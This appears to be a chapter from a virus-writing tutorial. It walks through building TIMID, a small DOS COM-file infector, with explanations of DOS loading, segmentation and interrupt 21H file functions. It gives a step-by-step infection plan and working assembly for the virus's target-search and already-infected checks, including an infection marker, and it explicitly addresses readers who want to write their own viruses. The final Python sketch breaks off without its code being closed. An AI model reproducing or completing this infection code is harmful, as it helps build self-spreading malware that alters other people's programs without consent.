A Simple COM File Infector

Here we will discuss one of the simplest of all computer viruses. This virus is very small, comprising only 264 bytes of machine language instructions. It is also fairly safe, because it has one of the simplest search routines possible. This virus, which we will call TIMID, is designed to infect only COM files which are in the currently logged directory on the computer. It does not jump across directories or drives, as long as you don’t call it from another directory, so it can be easily contained. It is also harmless because it contains no destructive code, and it tells you when it is infecting a new file, so you will know where it is and where it has gone. On the other hand, its extreme simplicity means that this is not a very effective virus. It will not infect most files, and it can easily be caught. Still, this virus will introduce all the essential concepts necessary to write a virus, with a minimum of complexity and a minimal risk to the experimenter. As such, it is an excellent instructional tool.

Some DOS Basics

To understand the means by which the virus copies itself from one program to another, we have to dig into the details of how the operating system, DOS, loads a program into memory and passes control to it. The virus must be designed so its code gets executed, rather than just the program it has attached itself to. Only then can it reproduce. Then, it must be able to pass control back to the host program, so the host can execute in its entirety as well.

When one enters the name of a program at the DOS prompt, DOS begins looking for files with that name and an extent of “COM”. If it finds one it will load the file into memory and execute it. Otherwise DOS will look for files with the same name and an extent of “EXE” to load and execute. If no EXE file is found, the operating system will finally look for a file with the extent “BAT” to execute. Failing all three of these possibilities, DOS will display the error message “Bad command or file name.”
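The lookup order just described can be modeled in a few lines. The sketch below is in Python rather than DOS assembly, purely for illustration. The function name resolve_command and the idea of passing the directory contents in as a list are assumptions of this example, not part of DOS.

```python
def resolve_command(name, files):
    """Return the file DOS would run for `name`, or None if nothing matches.

    `files` is a hypothetical list of file names in the searched directory.
    """
    present = {f.upper() for f in files}
    for ext in ("COM", "EXE", "BAT"):  # the order in which DOS tries the extents
        candidate = f"{name.upper()}.{ext}"
        if candidate in present:
            return candidate
    return None  # DOS would report "Bad command or file name"


print(resolve_command("edit", ["EDIT.EXE", "EDIT.COM", "EDIT.BAT"]))
print(resolve_command("edit", ["EDIT.BAT", "NOTES.TXT"]))
```

Note that a COM file always wins over an EXE or BAT file of the same name.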

EXE and COM files are directly executable by the Central Processing Unit. Of these two types of program files, COM files are much simpler. They have a predefined segment format which is built into the structure of DOS, while EXE files are designed to handle a user defined segment format, typical of very large and complicated programs. The COM file is a direct binary image of what should be put into memory and executed by the CPU, but an EXE file is not.

To execute a COM file, DOS must do some preparatory work before giving that program control. Most importantly, DOS controls and allocates memory usage in the computer. So first it checks to see if there is enough room in memory to load the program. If there is, DOS then allocates the memory required for the program. This step is little more than an internal housekeeping function. DOS simply records how much space it is making available for such and such a program, so it won’t try to load another program on top of it later, or give memory space to the program that would conflict with another program. Such a step is necessary because more than one program may reside in memory at any given time. For example, pop-up, memory resident programs can remain in memory, and parent programs can load child programs into memory, which execute and then return control to the parent.

Next, DOS builds a block of memory 256 bytes long known as the Program Segment Prefix, or PSP. The PSP is a remnant of an older operating system known as CP/M. CP/M was popular in the late seventies and early eighties as an operating system for microcomputers based on the 8080 and Z80 microprocessors. In the CP/M world, 64 kilobytes was all the memory a computer had. The lowest 256 bytes of that memory was reserved for the operating system itself to store crucial data. For example, location 5 in memory contained a jump instruction to get to the rest of the operating system, which was stored in high memory, and its location differed according to how much memory the computer had. Thus, programs written for these machines would access the operating system functions by calling location 5 in memory. When PC-DOS came along, it imitated CP/M because CP/M was very popular, and many programs had been written to work with it. So the PSP (and whole COM file concept) became a part of DOS. The result is that a lot of the information stored in the PSP is of little use to a DOS programmer today. Some of it is useful though, as we will see a little later.

Offset (Hex)   Size (bytes)   Description
0              2              Int 20H Instruction
2              2              Address of Last allocated segment
4              1              Reserved, should be zero
5              5              Far call to DOS function dispatcher
A              4              Int 22H vector (Terminate program)
E              4              Int 23H vector (Ctrl-C handler)
12             4              Int 24H vector (Critical error handler)
16             22             Reserved
2C             2              Segment of DOS environment
2E             34             Reserved
50             3              Int 21H / RETF instruction
53             9              Reserved
5C             16             File Control Block 1
6C             20             File Control Block 2
80             128            Default DTA (command line at startup)
100            -              Beginning of COM program

Figure 2: Format of the Program Segment Prefix.
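As a quick sanity check on the layout in Figure 2, the following Python sketch transcribes the offsets and sizes and verifies that the fields are contiguous and add up to the 256 bytes (100H) of the PSP. The names PSP_FIELDS and check_contiguous are made up for this illustration.

```python
# (offset, size, description) rows transcribed from Figure 2.
# A size of None marks the open-ended entry where the COM program begins.
PSP_FIELDS = [
    (0x00, 2, "Int 20H instruction"),
    (0x02, 2, "Address of last allocated segment"),
    (0x04, 1, "Reserved, should be zero"),
    (0x05, 5, "Far call to DOS function dispatcher"),
    (0x0A, 4, "Int 22H vector (terminate program)"),
    (0x0E, 4, "Int 23H vector (Ctrl-C handler)"),
    (0x12, 4, "Int 24H vector (critical error handler)"),
    (0x16, 22, "Reserved"),
    (0x2C, 2, "Segment of DOS environment"),
    (0x2E, 34, "Reserved"),
    (0x50, 3, "Int 21H / RETF instruction"),
    (0x53, 9, "Reserved"),
    (0x5C, 16, "File Control Block 1"),
    (0x6C, 20, "File Control Block 2"),
    (0x80, 128, "Default DTA (command line at startup)"),
    (0x100, None, "Beginning of COM program"),
]


def check_contiguous(fields):
    """Return True if every field starts exactly where the previous one ends."""
    expected = 0
    for offset, size, _ in fields:
        if offset != expected:
            return False
        if size is None:
            break
        expected = offset + size
    return True


psp_size = sum(size for _, size, _ in PSP_FIELDS if size is not None)
print(check_contiguous(PSP_FIELDS), hex(psp_size))
```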

Once the PSP is built, DOS takes the COM file stored on disk and loads it into memory just above the PSP, starting at offset 100H. Once this is done, DOS is almost ready to pass control to the program. Before it does, though, it must set up the registers in the CPU to certain predetermined values. First, the segment registers must be set properly, or a COM program cannot run. Let’s take a look at the how’s and why’s of these segment registers.

In the 8088 microprocessor, all registers are 16 bit registers. The problem is that a 16 bit register will only allow one to address 64 kilobytes of memory. If you want to use more memory, you need more bits to address it. The 8088 can address up to one megabyte of memory using a process known as segmentation. It uses two registers to create a physical memory address that is 20 bits long instead of just 16. Such a register pair consists of a segment register, which contains the most significant bits of the address, and an offset register, which contains the least significant bits. The segment register points to a 16 byte block of memory, and the offset register tells how many bytes to add to the start of the 16 byte block to locate the desired byte in memory. For example, if the ds register is set to 1275 Hex and the bx register is set to 457 Hex, then the physical 20 bit address of the byte ds:[bx] is

    1275H x 10H = 12750H
                +   457H
                --------
                  12BA7H

No offset should ever have to be larger than 15, but one normally uses values up to the full 64 kilobyte range of the offset register. This leads to the possibility of writing a single physical address in several different ways. For example, setting ds = 12BA Hex and bx = 7 would produce the same physical address 12BA7 Hex as in the example above. The proper choice is simply whatever is convenient for the programmer. However, it is standard programming practice to set the segment registers and leave them alone as much as possible, using offsets to range through as much data and code as one can (64 kilobytes if necessary).
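The address arithmetic is easy to try out. The Python sketch below (the function name physical_address is just a label chosen for this example) shifts the segment left by four bits, which is the same as multiplying by 10H, and adds the offset. It shows that the two register settings discussed above land on the same byte.

```python
def physical_address(segment, offset):
    """Combine a 16-bit segment and offset into a 20-bit 8088 physical address."""
    # Shifting left by 4 bits multiplies the segment by 10H (16 decimal).
    # The mask models the wrap-around at one megabyte on a 20-bit address bus.
    return ((segment << 4) + offset) & 0xFFFFF


print(hex(physical_address(0x1275, 0x457)))
print(hex(physical_address(0x12BA, 0x7)))
```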

The 8088 has four segment registers, cs, ds, ss and es, which stand for Code Segment, Data Segment, Stack Segment, and Extra Segment, respectively. They each serve different purposes. The cs register specifies the 64K segment where the actual program instructions which are executed by the CPU are located. The Data Segment is used to specify a segment to put the program’s data in, and the Stack Segment specifies where the program’s stack is located. The es register is available as an extra segment register for the programmer’s use. It might typically be used to point to the video memory segment, for writing data directly to video, etc.

COM files are designed to operate with a very simple, but limited segment structure: namely, they have one segment, cs=ds=es=ss. All data is stored in the same segment as the program code itself, and the stack shares this segment. Since any given segment is 64 kilobytes long, a COM program can use at most 64 kilobytes for all of its code, data and stack. When PCs were first introduced, everybody was used to writing programs limited to 64 kilobytes, and that seemed like a lot of memory. However, today it is not uncommon to find programs that require several hundred kilobytes of code, and maybe as much data. Such programs must use a more complex segmentation scheme than the COM file format allows. The EXE file structure is designed to handle that complexity. The drawback with the EXE file is that the program code which is stored on disk must be modified significantly before it can be executed by the CPU. DOS does that at load time, and it is completely transparent to the user, but a virus that attaches to EXE files must not upset DOS during this modification process, or it won’t work. A COM program doesn’t require this modification process because it uses only one segment for everything. This makes it possible to store a straight binary image of the code to be executed on disk (the COM file). When it is time to run the program, DOS only needs to set up the segment registers properly and execute it.

The PSP is set up at the beginning of the segment allocated for the COM file, i.e. at offset 0. DOS picks the segment based on what free memory is available, and puts the PSP at the very start of that segment. The COM file itself is loaded at offset 100 Hex, just after the PSP. Once everything is ready, DOS transfers control to the beginning of the program by jumping to the offset 100 Hex in the code segment where the program was loaded. From there on, the program runs, and it accesses DOS occasionally, as it sees fit, to perform various I/O functions, like reading and writing to disk. When the program is done, it transfers control back to DOS, and DOS releases the memory reserved for that program and gives the user another command line prompt.

Figure 3: Memory map just before executing a COM file.

An Outline for a Virus

In order for a virus to reside in a COM file, it must get control passed to its code at some point during the execution of the program. It is conceivable that a virus could examine a COM file and determine how it might wrest control from the program at any point during its execution. Such an analysis would be very difficult, though, for the general case, and the resulting virus would be anything but simple. By far the easiest point to take control is right at the very beginning, when DOS jumps to the start of the program.

At this time, the virus is completely free to use any space above the image of the COM file which was loaded into memory by DOS. Since the program itself has not yet executed, it cannot have set up data anywhere in memory, or moved the stack, so this is a very safe time for the virus to operate. At this stage, it isn’t too difficult a task to make sure that the virus will not interfere with the host program to damage it or render it inoperative. Once the host program begins to execute, almost anything can happen, though, and the virus’s job becomes much more difficult.

To gain control at startup time, a virus infecting a COM file must replace the first few bytes in the COM file with a jump to the virus code, which can be appended at the end of the COM file. Then, when the COM file is executed, it jumps to the virus, which goes about looking for more files to infect, and infecting them. When the virus is ready, it can return control to the host program. The problem in doing this is that the virus already replaced the first few bytes of the host program with its own code. Thus it must restore those bytes, and then jump back to offset 100 Hex, where the original program begins.

Figure 4: Replacing the first bytes in a COM file.

Here, then, is the basic plan for a simple viral infection of a COM file. Imagine a virus sitting in memory, which has just been activated. It goes out and infects another COM file with itself. Step by step, it might work like this:

1. An infected COM file is loaded into memory and executed. The viral code gets control first.
2. The virus in memory searches the disk to find a suitable COM file to infect.
3. If a suitable file is found, the virus appends its own code to the end of the file.
4. Next, it reads the first few bytes of the file into memory, and writes them back out to the file in a special data area within the virus’ code. The new virus will need these bytes when it executes.
5. Next the virus in memory writes a jump instruction to the beginning of the file it is infecting, which will pass control to the new virus when its host program is executed.
6. Then the virus in memory takes the bytes which were originally the first bytes in its host, and puts them back (at offset 100H).
7. Finally, the viral code jumps to offset 100 Hex and allows its host program to execute.

Ok. So let’s develop a real virus with these specifications. We will need both a search mechanism and a copy mechanism.

The Search Mechanism

To understand how a virus searches for new files to infect on an IBM PC style computer operating under MS-DOS or PC-DOS, it is important to understand how DOS stores files and information about them. All of the information about every file on disk is stored in two areas on disk, known as the directory and the File Allocation Table, or FAT for short. The directory contains a 32 byte file descriptor record for each file. This descriptor record contains the file’s name and extent, its size, date and time of creation, and the file attribute, which contains essential information for the operating system about how to handle the file. The FAT is a map of the entire disk, which simply informs the operating system which areas are occupied by which files.

[Figure: The Directory Entry. Bytes 0 to 0FH: File Name, Attr, Reserved. Remaining bytes: Reserved, Time, Date, First Cluster, File Size.]

Figure 5: The directory entry record format.

Each disk has two FAT’s, which are identical copies of each other. The second is a backup, in case the first gets corrupted. On the other hand, a disk may have many directories. One directory, known as the root directory, is present on every disk, but the root may have multiple subdirectories, nested one inside of another to form a tree structure. These subdirectories can be created, used, and removed by the user at will. Thus, the tree structure can be as simple or as complex as the user has made it.

Both the FAT and the root directory are located in a fixed area of the disk, reserved especially for them. Subdirectories are stored just like other files with the file attribute set to indicate that this file is a directory. The operating system then handles this subdirectory file in a completely different manner than other files to make it look like a directory, and not just another file. The subdirectory file simply consists of a sequence of 32 byte records describing the files in that directory. It may contain a 32 byte record with the attribute set to directory, which means that this file is a subdirectory of a subdirectory.
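To make the 32 byte record concrete, here is a small Python sketch that unpacks one directory entry. The field widths (8 byte name, 3 byte extent, 1 attribute byte, 10 reserved bytes, then time, date, first cluster and size) and the directory attribute bit 10H follow the standard FAT directory format rather than anything spelled out in the text above, and the sample record is invented for the demonstration.

```python
import struct

# name(8) extent(3) attribute(1) reserved(10) time(2) date(2) cluster(2) size(4)
# "<" selects little-endian byte order with no padding between fields.
DIR_ENTRY = struct.Struct("<8s3sB10sHHHI")

ATTR_DIRECTORY = 0x10  # attribute bit marking a subdirectory


def parse_dir_entry(raw):
    """Decode one 32 byte directory record into a dictionary."""
    name, ext, attr, _reserved, _time, _date, cluster, size = DIR_ENTRY.unpack(raw)
    return {
        "name": name.decode("ascii").rstrip(),
        "ext": ext.decode("ascii").rstrip(),
        "is_directory": bool(attr & ATTR_DIRECTORY),
        "first_cluster": cluster,
        "size": size,
    }


# An invented record, built only to exercise the parser.
sample = DIR_ENTRY.pack(b"HYPER   ", b"COM", 0x00, bytes(10), 0, 0, 2, 1234)
print(DIR_ENTRY.size)
print(parse_dir_entry(sample))
```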

The DOS operating system normally controls all access to files and subdirectories. If one wants to read or write to a file, he does not write a program that locates the correct directory on the disk, reads the file descriptor records to find the right one, figures out where the file is and reads it. Instead of doing all of this work, he simply gives DOS the directory and name of the file and asks it to open the file. DOS does all the grunt work. This saves a lot of time in writing and debugging programs. One simply does not have to deal with the intricate details of managing files and interfacing with the hardware.

DOS is told what to do using interrupt service routines (ISR’s). Interrupt 21H is the main DOS interrupt service routine that we will use. To call an ISR, one simply sets up the required CPU registers with whatever values the ISR needs to know what to do, and calls the interrupt. For example, the code

    mov  ax,SEG FNAME      ;a segment register cannot be loaded
    mov  ds,ax             ;with a constant directly, so go via ax
    mov  dx,OFFSET FNAME   ;ds:dx points to filename
    xor  al,al             ;al=0
    mov  ah,3DH            ;DOS function 3D
    int  21H               ;go do it

opens a file whose name is stored in the memory location FNAME in preparation for reading it into memory. This function tells DOS to locate the file and prepare it for reading. The “int 21H” instruction transfers control to DOS and lets it do its job. When DOS is finished opening the file, control returns to the statement immediately after the “int 21H”. The register ah contains the function number, which DOS uses to determine what you are asking it to do. The other registers must be set up differently, depending on what ah is, to convey more information to DOS about what it is supposed to do. In the above example, the ds:dx register pair is used to point to the memory location where the name of the file to open is stored. The register al tells DOS to open the file for reading only.

All of the various DOS functions, including how to set up all the registers, are detailed in many books on the subject. Peter Norton’s Programmer’s Guide to the IBM PC is one of the better ones, so if you don’t have that information readily available, I suggest you get a copy. Here we will only discuss the DOS functions we need, as we need them. This will probably be enough to get by. However, if you are going to write viruses of your own, it is definitely worthwhile knowing about all of the various functions you can use, as well as the finer details of how they work and what to watch out for.

To write a routine which searches for other files to infect, we will use the DOS search functions. The people who wrote DOS knew that many programs (not just viruses) require the ability to look for files and operate on them if any of the required type are found. Thus, they incorporated a pair of searching functions into the interrupt 21H handler, called Search First and Search Next. These are some of the more complicated DOS functions, so they require the user to do a fair amount of preparatory work before he calls them. The first step is to set up an ASCIIZ string in memory to specify the directory to search, and what files to search for. This is simply an array of bytes terminated by a null byte (0). DOS can search and report on either all the files in a directory or a subset of files which the user can specify by file attribute and by specifying a file name using the wildcard characters “?” and “*”, which you should be familiar with from executing commands like copy *.* a: and dir a???_100.* from the command line in DOS. (If not, a basic book on DOS will explain this syntax.) For example, the ASCIIZ string

    DB   '\system\hyper.*',0

will set up the search function to search for all files with the name hyper, and any possible extent, in the subdirectory named system. DOS might find files like hyper.c, hyper.prn, hyper.exe, etc.

After setting up this ASCIIZ string, one must set the registers ds and dx up to the segment and offset of this ASCIIZ string in memory. Register cx must be set to a file attribute mask (the attribute bits occupy its low byte, cl) which will tell DOS which file attributes to allow in the search, and which to exclude. The logic behind this attribute mask is somewhat complex, so you might want to study it in detail in Appendix G. Finally, to call the Search First function, one must set ah = 4E Hex.

If the search first function is successful, it returns with register al = 0, and it formats 43 bytes of data in the Disk Transfer Area, or DTA. This data provides the program doing the search with the name of the file which DOS just found, its attribute, its size and its date of creation. Some of the data reported in the DTA is also used by DOS for performing the Search Next function. If the search cannot find a matching file, DOS returns al non-zero, with no data in the DTA. Since the calling program knows the address of the DTA, it can go examine that area for the file information after DOS has stored it there.

To see how this function works more clearly, let us consider an example. Suppose we want to find all the files in the currently logged directory with an extent “COM”, including hidden and system files. The assembly language code to do the Search First would look like this (assuming ds is already set up correctly):

SRCH_FIRST:
    mov  dx,OFFSET COMFILE  ;set offset of asciiz string
    mov  cx,00000110B       ;set hidden and system attributes
    mov  ah,4EH             ;search first function
    int  21H                ;call DOS
    or   al,al              ;check to see if successful
    jnz  NOFILE             ;go handle no file found condition
FOUND:                      ;come here if file found

COMFILE DB   '*.COM',0

If this routine executed successfully, the DTA might look like this:

03 3F 3F 3F 3F 3F 3F 3F-3F 43 4F 4D 06 18 00 00 .????????COM....
00 00 00 00 00 00 16 98-30 13 BC 62 00 00 43 4F ........0..b..CO
4D 4D 41 4E 44 2E 43 4F-4D 00 00 00 00 00 00 00 MMAND.COM.......

when the program reaches the label FOUND. In this case the search found the file COMMAND.COM.
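The dump above can be decoded by hand, but a short Python sketch makes the layout easier to see. The field offsets used here (attribute at 15H, time at 16H, date at 18H, size at 1AH, and the null-terminated name at 1EH) are the conventional layout of the Search First data and are an assumption of this example, since the text does not list them. The function name parse_dta is likewise just a label.

```python
import struct

# The 48 bytes shown in the dump above (the search data itself is 43 bytes).
DTA_DUMP = bytes.fromhex(
    "03 3F 3F 3F 3F 3F 3F 3F 3F 43 4F 4D 06 18 00 00 "
    "00 00 00 00 00 00 16 98 30 13 BC 62 00 00 43 4F "
    "4D 4D 41 4E 44 2E 43 4F 4D 00 00 00 00 00 00 00"
)


def parse_dta(dta):
    """Pull the attribute, size and name of the found file out of the DTA."""
    # One byte, two 16-bit words and one 32-bit word, little-endian, from 15H.
    attr, _time, _date, size = struct.unpack_from("<BHHI", dta, 0x15)
    # The name is an ASCIIZ string of at most 13 bytes starting at 1EH.
    name = dta[0x1E:0x1E + 13].split(b"\0", 1)[0].decode("ascii")
    return {"attr": attr, "size": size, "name": name}


print(parse_dta(DTA_DUMP))
```

The size field comes out as 62BC Hex, which is the length of the COMMAND.COM file found in this example.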

In comparison with the Search First function, the Search Next is easy, because all of the data has already been set up by the Search First. Just set ah = 4F hex and call DOS interrupt 21H:

    mov  ah,4FH             ;search next function
    int  21H                ;call DOS
    or   al,al              ;see if a file was found
    jnz  NOFILE             ;no, go handle no file found
FOUND2:                     ;else process the file

If another file is found, the data in the DTA will be updated with the new file name, and al will be set to zero on return. If no more matches are found, DOS will set al to something besides zero on return. One must be careful here so the data in the DTA is not altered between the call to Search First and later calls to Search Next, because the Search Next expects the data from the last search call to be there.

Of course, the computer virus does not need to search through all of the COM files in a directory. It must find one that will be suitable to infect, and then infect it. Let us imagine a procedure FILE_OK. Given the name of a file on disk, it will determine whether that file is good to infect or not. If it is infectable, FILE_OK will return with the zero flag, z, set, otherwise it will return with the zero flag reset. We can use this flag to determine whether to continue searching for other files, or whether we should go infect the one we have found.

If our search mechanism as a whole also uses the z flag to tell the main controlling program that it has found a file to infect (z=file found, nz=no file found) then our completed search function can be written like this:

FIND_FILE:
    mov  dx,OFFSET COMFILE
    mov  cx,00000110B       ;attribute mask goes in cx
    mov  ah,4EH             ;perform search first
    int  21H
FF_LOOP:
    or   al,al              ;any possibilities found?
    jnz  FF_DONE            ;no - exit with z reset
    call FILE_OK            ;yes, go check if we can infect it
    jz   FF_DONE            ;yes - exit with z set
    mov  ah,4FH             ;no - search for another file
    int  21H
    jmp  FF_LOOP            ;go back up and see what happened
FF_DONE:
    ret                     ;return to main virus control routine

Figure 6: Logic of the file search routine.

Study this search routine carefully. It is important to understand if you want to write computer viruses, and more generally, it is useful in a wide variety of programs of all kinds.
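The control flow of this loop is a general pattern: step through candidates one at a time and stop at the first one that passes a test. As a rough model only, here is the same logic in Python. The name list stands in for the directory, fnmatchcase only approximates DOS wildcard rules, and the function and parameter names are invented for this sketch.

```python
from fnmatch import fnmatchcase


def find_file(names, pattern, file_ok):
    """Return the first name matching `pattern` that `file_ok` accepts, else None."""
    matches = (n for n in names if fnmatchcase(n.upper(), pattern.upper()))
    for name in matches:   # each step plays the role of Search First / Search Next
        if file_ok(name):  # candidate accepted: stop searching ("z set" exit)
            return name
    return None            # candidates exhausted ("z reset" exit)


names = ["README.TXT", "BIG.COM", "SMALL.COM"]
print(find_file(names, "*.COM", lambda n: n.startswith("SMALL")))
print(find_file(names, "*.COM", lambda n: False))
```

As in the assembly version, the test routine is never called when no file matches the pattern at all.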

Of course, for our virus to work correctly, we have to write the FILE_OK function which determines whether a file should be infected or left alone. This function is particularly important to the success or failure of the virus, because it tells the virus when and where to move. If it tells the virus to infect a program which does not have room for the virus, then the newly infected program may be inadvertently ruined. Or if FILE_OK cannot tell whether a program has already been infected, it will tell the virus to go ahead and infect the same file again and again and again. Then the file will grow larger and larger, until there is no more room for an infection. For example, the routine

FILE_OK:
    xor  al,al
    ret

simply sets the z flag and returns. If our search routine used this subroutine, it would always stop and say that the first COM file it found was the one to infect. The result would be that the first COM program in a directory would be the only program that would ever get infected. It would just keep getting infected again and again, and growing in size, until it exceeded its size limit and crashed. So although the above example of FILE_OK might enable the virus to infect at least one file, it would not work well enough for the virus to be able to start jumping from file to file.

A good FILE_OK routine must perform two checks: (1) it must check a file to see if it is too long to attach the virus to, and (2) it must check to see if the virus is already there. If the file is short enough, and the virus is not present, FILE_OK should return a “go ahead” to the search routine.

On entry to FILE_OK, the search function has set up the DTA with 43 bytes of information about the file to check, including its size and its name. Suppose that we have defined two labels, FSIZE and FNAME in the DTA to access the file size and file name respectively. Then checking the file size to see if the virus will fit is a simple matter. Since the file size of a COM file is always less than 64 kilobytes, we may load the size of the file we want to infect into the ax register:

    mov  ax,WORD PTR [FSIZE]

Next we add the number of bytes the virus will have to add to this file, plus 100H. The 100H is needed because DOS will also allocate room for the PSP, and load the program file at offset 100H. To determine the number of bytes the virus will need automatically, we simply put a label VIRUS at the start of the virus code we are writing and a label END_VIRUS at the end of it, and take the difference. If we add these bytes to ax, and ax overflows, then the file which the search routine has found is too large to permit a successful infection. An overflow will cause the carry flag c to be set, so the file size check will look something like this:

FILE_OK:
    mov  ax,WORD PTR [FSIZE]
    add  ax,OFFSET END_VIRUS - OFFSET VIRUS + 100H
    jc   BAD_FILE
    .
    .
    .
GOOD_FILE:
    xor  al,al
    ret
BAD_FILE:
    mov  al,1
    or   al,al
    ret

This routine will suffice to prevent the virus from infecting any file that is too large.
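The carry test is ordinary 16 bit arithmetic, and it can be modeled in Python to see where the limit falls. The helper names below are invented for this sketch, and the 264 byte figure is the code size quoted at the start of the chapter.

```python
def add16(a, b):
    """Add two values as a 16-bit register would; return (result, carry)."""
    total = a + b
    return total & 0xFFFF, total > 0xFFFF


def fits_in_segment(file_size, added_bytes):
    """True if file_size + added_bytes + 100H does not overflow 16 bits."""
    _, carry = add16(file_size, added_bytes + 0x100)
    return not carry


print(fits_in_segment(25276, 264))
print(fits_in_segment(65200, 264))
```

The first call models a file of 25276 bytes, which leaves plenty of room. The second models a file so close to 64 kilobytes that the addition carries, which is the case the jc instruction catches.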

The next problem that the FILE_OK routine must deal with is how to avoid infecting a file that has already been infected. This can only be accomplished if the virus has some understanding of how it goes about infecting a file. In the TIMID virus, we have decided to replace the first few bytes of the host program with a jump to the viral code. Thus, the FILE_OK procedure can go out and read the file which is a candidate for infection to determine whether its first instruction is a jump. If it isn’t, then the virus obviously has not infected that file yet. There are two kinds of jump instructions which might be encountered in a COM file, known as a near jump and a short jump. The virus we create here will always use a near jump to gain control when the program starts. Since a short jump only has a range of 128 bytes, we could not use it to infect a COM file larger than 128 bytes. The near jump allows a range of 64 kilobytes. Thus it can always be used to jump from the beginning of a COM file to the virus, at the end of the program, no matter how big the COM file is (as long as it is really a valid COM file). A near jump is represented in machine language with the byte E9 Hex, followed by two bytes which tell the CPU how far to jump. Thus, our first test to see if infection has already occurred is to check to see if the first byte in the file is E9 Hex. If it is anything else, the virus is clear to go ahead and infect.

Looking for E9 Hex is not enough though. Many COM files are designed so the first instruction is a jump to begin with. Thus the virus may encounter files which start with an E9 Hex even though they have never been infected. The virus cannot assume that a file has been infected just because it starts with an E9. It must go farther. It must have a way of telling whether a file has been infected even when it does start with E9. If we do not incorporate this extra step into the FILE_OK routine, the virus will pass by many good COM files which it could infect because it thinks they have already been infected. While failure to incorporate such a feature into FILE_OK will not cause the virus to fail, it will limit its functionality.

One way to make this test simple and yet very reliable is to change a couple more bytes than necessary at the beginning of the host program. The near jump will require three bytes, so we might take two more, and encode them in a unique way so the virus can be pretty sure the file is infected if those bytes are properly encoded. The simplest scheme is to just set them to some fixed value. We’ll use the two characters “VI” here. Thus, when a file begins with a near jump followed by the bytes “V”=56H and “I”=49H, we can be almost positive that the virus is there, and otherwise it is not. Granted, once in a great while the virus will discover a COM file which is set up with a jump followed by “VI” even though it hasn’t been infected. The chances of this occurring are so small, though, that it will be no great loss if the virus fails to infect this rare one file in a million. It will infect everything else.
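The same two-part test is what a scanning tool would use to recognize a marked file. The Python sketch below, with names invented for the illustration, checks five bytes for a near jump opcode followed two bytes later by the "VI" marker.

```python
NEAR_JMP = 0xE9   # opcode of the near jump
MARKER = b"VI"    # the bytes 56H, 49H


def has_marker(first_five):
    """True if the bytes look like a near jump followed by the 'VI' marker."""
    return (
        len(first_five) >= 5
        and first_five[0] == NEAR_JMP
        and first_five[3:5] == MARKER
    )


print(has_marker(bytes([0xE9, 0x34, 0x12]) + b"VI"))       # jump plus marker
print(has_marker(bytes([0xE9, 0x34, 0x12, 0x90, 0x90])))   # jump, no marker
print(has_marker(bytes([0xB4, 0x09, 0xBA, 0x56, 0x49])))   # marker bytes, no jump
```

Only the first sample passes. A file that merely starts with a jump, or that merely happens to contain the two marker bytes, is not treated as marked.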

To read the first five bytes of the file, we open it with DOS Interrupt 21H function 3D Hex. This function requires us to set ds:dx to point to the file name (FNAME) and to specify the access rights which we desire in the al register. In the FILE_OK routine the virus only needs to read the file. Yet we will try to open it with read/write access, rather than read-only access. If the file attribute is set to read-only, an attempt to open in read/write mode will result in an error (which DOS signals by setting the carry flag on return from INT 21H). This will allow the virus to detect read-only files and avoid them, since the virus must write to a file to infect it. It is much better to find out that the file is read-only here, in the search routine, than to assume the file is good to infect and then have the virus fail when it actually attempts infection. Thus, when opening the file, we set al = 2 to tell DOS to open it in read/write mode. If DOS opens the file successfully, it returns a file handle in ax. This is just a number which DOS uses to refer to the file in all future requests. The code to open the file looks like this:

    mov  ax,3D02H
    mov  dx,OFFSET FNAME
    int  21H
    jc   BAD_FILE

Figure 7: The file handle and file pointer.

Once the file is open, the virus may perform the actual read operation, DOS function 3F Hex. To read a file, one must set bx equal to the file handle number and cx to the number of bytes to read from the file. Also ds:dx must be set to the location in memory where the data read from the file should be stored (which we will call START_IMAGE). DOS stores an internal file pointer for each open file which keeps track of where in the file DOS is going to do its reading and writing from. The file pointer is just a four byte long integer, which specifies which byte in the selected file a read or write operation refers to. This file pointer starts out pointing to the first byte in the file (file pointer = 0), and it is automatically advanced by DOS as the file is read from or written to. Since it starts at the beginning of the file, and the FILE_OK procedure must read the first five bytes of the file, there is no need to touch the file pointer right now. However, you should be aware that it is there, hidden away by DOS. It is an essential part of any file reading and writing we may want to do. When it comes time for the virus to infect the file, it will have to modify this file pointer to grab a few bytes here and put them there, etc. Doing that is much faster (and hence, less noticeable) than reading a whole file into memory, manipulating it in memory, and then writing it back to disk. For now, though, the actual reading of the file is fairly simple. It looks like this:

    mov  bx,ax                  ;put handle in bx
    mov  cx,5                   ;prepare to read 5 bytes
    mov  dx,OFFSET START_IMAGE  ;to START_IMAGE
    mov  ah,3FH
    int  21H                    ;go do it

We will not worry about the possibility of an error in reading five bytes here. The most likely problem is that the file is too short to supply five bytes, in which case DOS simply returns in ax the number of bytes it actually read, and we are pretty safe in assuming that most COM files will have more than four bytes in them.

Finally, to close the file, we use DOS function 3E Hex and put the file handle in bx. Putting it all together, the FILE_OK procedure looks like this:

FILE_OK:
    mov dx,OFFSET FNAME  ;first open the file
    mov ax,3D02H  ;r/w access open file
    int 21H
    jc FOK_NZEND  ;error opening file - file can't be used

    mov bx,ax  ;put file handle in bx
    push bx  ;and save it on the stack
    mov cx,5  ;read 5 bytes at the start of the program
    mov dx,OFFSET START_IMAGE  ;and store them here
    mov ah,3FH  ;DOS read function
    int 21H

    pop bx  ;restore the file handle
    mov ah,3EH
    int 21H  ;and close the file

    mov ax,WORD PTR [FSIZE]  ;get the file size of the host
    add ax,OFFSET ENDVIRUS - OFFSET VIRUS  ;and add size of virus to it
    jc FOK_NZEND  ;c set if ax overflows (size > 64k)
    cmp BYTE PTR [START_IMAGE],0E9H  ;size ok-is first byte a near jmp?
    jnz FOK_ZEND  ;not near jmp, file must be ok, exit with z
    cmp WORD PTR [START_IMAGE+3],4956H  ;ok, is 'VI' in positions 3 & 4?
    jnz FOK_ZEND  ;no, file can be infected, return with Z set
FOK_NZEND:
    mov al,1  ;we'd better not infect this file
    or al,al  ;so return with z reset
    ret
FOK_ZEND:
    xor al,al  ;ok to infect, return with z set
    ret
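The decision made at the end of FILE_OK can also be restated in a higher-level language, which is handy for checking by hand whether a given file carries the marker. The Python sketch below is only a model of that logic, not part of the virus. The function names and the `added_len` parameter are our own, and a header shorter than five bytes is simply treated as unmarked, which is an assumption the assembly code does not make.

```python
NEAR_JMP = 0xE9   # opcode of the 8086 near jump
MARKER = b"VI"    # the word 4956H as it lies in memory (low byte first)


def already_marked(header: bytes) -> bool:
    """True if the first five bytes are a near jump followed by 'VI'."""
    return len(header) >= 5 and header[0] == NEAR_JMP and header[3:5] == MARKER


def fits_in_segment(file_size: int, added_len: int) -> bool:
    """Model of the carry test: the 16-bit sum must not overflow."""
    return file_size + added_len <= 0xFFFF


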